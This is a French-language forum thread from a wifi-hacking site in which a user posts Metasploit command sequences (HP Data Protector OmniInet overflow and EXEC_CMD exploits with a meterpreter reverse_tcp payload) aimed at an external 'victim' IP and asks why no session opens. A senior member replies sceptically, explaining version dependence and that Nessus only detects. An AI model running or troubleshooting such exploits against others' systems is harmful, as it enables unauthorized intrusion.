Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 24-10-2012 19:59:39

T2L
N00b
Inscription : 24-10-2012
Messages : 3

Probleme exploit Hp data protector remote command execution

Bonjours, il y a quelque temps j'ai decouvert quelque faille sur certain reseau, ces failles pouvant etre exploiter pour la majeur partie (selon le scan nessus) avec les exploits

(HP OmniInet.exe Opcode 20 Buffer Overflow & HP Data Protector 6 EXEC_CMD Remote Code Execution)

Je suis pratiquement certain que pour la premiere il y a possibilite d'exploit car lorsque je lance l'exploit le service sur la machine host crash, mais je n'obtient aucune session meterpreter -_- donc je vous explique ma config

-Windows 7
-Desactive le firewall de windows lors de l'exploit
-Backtrack 5r3 sur Vmware
-Bridged network
-Ip interne static sur backtrack
-Ouverture des ports 4444,443,8080,22080 sur le router et associer a l'ip static de backtrack (deja tester avec une backdoor executable et un multi/handler)

et jenvoie l'exploit de cette manniere

use exploit/windows/misc/hp_omniinet_4
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0 (egalement eseyer avec mon adresse ip interne de batrack)
set rhost (ip externe de la victime)
exploit

Cela envoie la commande, fait planter le service mais ne me donne aucune session.

jai egalement eseyer de cette maniere :

use exploit/windows/misc/hp_omniinet_4
set payload windows/meterpreter/reverse_tcp
set lhost (mon addresse ip externe)
set ReverseListenerBindAddress    (mon addresse ip interne de backtrack)
set rhost (ip externe de la victime)
exploit

mais cela donne le meme resultat.

Pour la 2iem exploit je suis sur qu'il est possible d'executer des commandes sur la machine cible car le rapport de nessus est le suivant :

Plugin Output
Nessus was able to exploit the vulnerability to execute the command
'\windows\system32\ipconfig.exe' on the remote host, which produced the following output :
------------------------------ snip ------------------------------

Windows IP Configuration


Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Local Area Connection 2:

IP Address. . . . . . . . . . . . : X.X.X.X
Subnet Mask . . . . . . . . . . . : X.X.X.X
Default Gateway . . . . . . . . . : X.X.X.X
0
------------------------------ snip ------------------------------

Jai donc eseyer d'exploiter cette faille de cette maniere :
(je precise que jai eseyer une grandes varieter de commandes)

exploit/linux/misc/hp_data_protector_cmd_exec
set payload cmd/unix/generic
set target 0
set cmd \windows\system32\ipconfig.exe
set rhost (ip externe de la machine victime)
exploit
Waiting...
Sending our command...
Error in connection or socket.

Impossible d'executer une commande sans recevoir l'output "Error in connection or socket."

Donc si quelqu'un aurait une idee comment exploiter l'une ou l'autre de ces alternative, me dire le probleme de ma config ou simplement me dire comment savoir de qu'elle facon nessus execute la 2iem exploit avec succes se serait tres apprecier, merci d'avance wink !!

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 24-10-2012 22:24:53

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Probleme exploit Hp data protector remote command execution

C'est juste moi ou bien il y a des "similarités" énormes avec cet autre topic ?
--> Probleme Metasploit

C'est quoi, du double-post déguisé ? roll

Hors Ligne

#3 25-10-2012 05:01:28

T2L
N00b
Inscription : 24-10-2012
Messages : 3

Re : Probleme exploit Hp data protector remote command execution

Pour ton info, je ne me souvient plus de mon mot de passe alors jai creer un autre compte, et je fini mon cour dici 3 semaine, et j'aimerais bien savoir comment reussir cet simple exploit, et si je pourrait je posterait mon probleme sur tout les topic de ce site car sur tout les membres qu'ils y a ici un seul ma repondu(merci a fuji) et je comprend qu'il ne peut pas etre la tout le temps, du coup je recoi une reponse au 5 jours donc puisqu'il me reste seulement 3 semaine se serait cool davoir un semblant de solution dici la, donc si personne peu me repondre ici alors il suffi de me dire que je ne suit pas sur un site comptant des personnes qualifier pour ce genre d'exploit et j'aretterais de perdre mon temps et faire perdre le votre.

Hors Ligne

#4 26-10-2012 04:43:53

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Probleme exploit Hp data protector remote command execution

Bon, il faut dire que le problème que ta bien voulu porter à notre connaissance est un grand cafouillage ! désolé de te le dire, mais digne d'un script kiddie. Ne crois surtout pas que nous connaissons ici les presque deux milles exploits/auxiliary de Metasploit, y a pas un membre ici qui se nomme HD Moore et rare ceux qui ont la chance de pratiquer du pentest sur une vraie infrastructure d'entreprise et autre S.I. Mais puisque tu insistes on va essayer d'avancer avec tâtonnement dans le but de te faire comprendre en terme de pentest et surtout pas s’immiscer dans ton attaque.

Le HP Data Protector est un logiciel permettant de gérer une baies de stockage de plusieurs Tera octets, donc celle-ci doit être coincée quelque part entre deux serveurs. Si une infrastructure a besoin d'un tel espace de stockage elle doit certainement devoir gérer beaucoup de ressources et cela implique surement qu'il n y a pas un seul mais des sous-réseaux délimités par des routeurs, ou es-tu placé pour mener ce test ? tu ne veux pas nous le dire. Si tu mènes tes tests depuis l’intérieur tu sauras faire une cartographie du LAN afin de voir les cheminement du trafic et éventuellement configurer les ports/ip sur ton ordi ? qu'est ce que No-IP vient faire dedans ? si tu es positionné depuis l’extérieur de ce LAN, il inconcevable que cette baies soit accessible directement comme un serveur Apache, l'administrateur qui aurait monté ce réseau ainsi doit retourner à l’école et en vitesse ! à moins que tu aies déjà piégé une machine avec laquelle tu t'en serves pour avoir un accès au LAN, d'ou la nécessité de redirection avec No-IP, mais ça implique de procéder ensuite à du pivoting, une autre forme de gymnastique difficile à maîtriser, j'y crois pas du tout.

L'exploit que tu cites n'est valable que pour cette version d'HP Data Protector A.06.10 b611 / A.06.11 b243, as-tu scanné le module en question afin de savoir s'il correspond à ton exploit ? celui-ci est basé sur du buffer overflow ou débordement de tampon pour exploiter la vulnérabilité si elle existe ! rien ne prouve qu'elle a été corrigée et puis ce genre d'exploit fonctionne au nanomètre prés, un bit de plus ou un bit de moins et ça foire, les exploits à base de BOF sont très souvent efficace dans les premiers moment de la découverte de la faille et la production d'un Poc ou de l'exploit qui va avec, or il date il y a plus d'un an, les produits Microsoft sont souvent réputés pour faire leur UPdate de façon automatique. Tu peux aller voir Dookie c'est lui l'inventeur de cet exploit.

- Nessus n'exploite rien, il détecte.
- Tu n'as pas besoin de dissimuler tes adresses IP locales, personne ne peut localiser quoi que ce soit.

Je ne sais pas t'en dire plus, à toi de chercher tout seul wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 222 04-12-2016 16:20:59 par pwerrick
8 237 26-11-2016 00:02:49 par koala
Problème reaver par Antho3674
4 314 15-11-2016 22:05:12 par kcdtv
1 400 18-09-2016 12:54:01 par kcdtv
3 344 14-08-2016 10:22:07 par MiscL

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]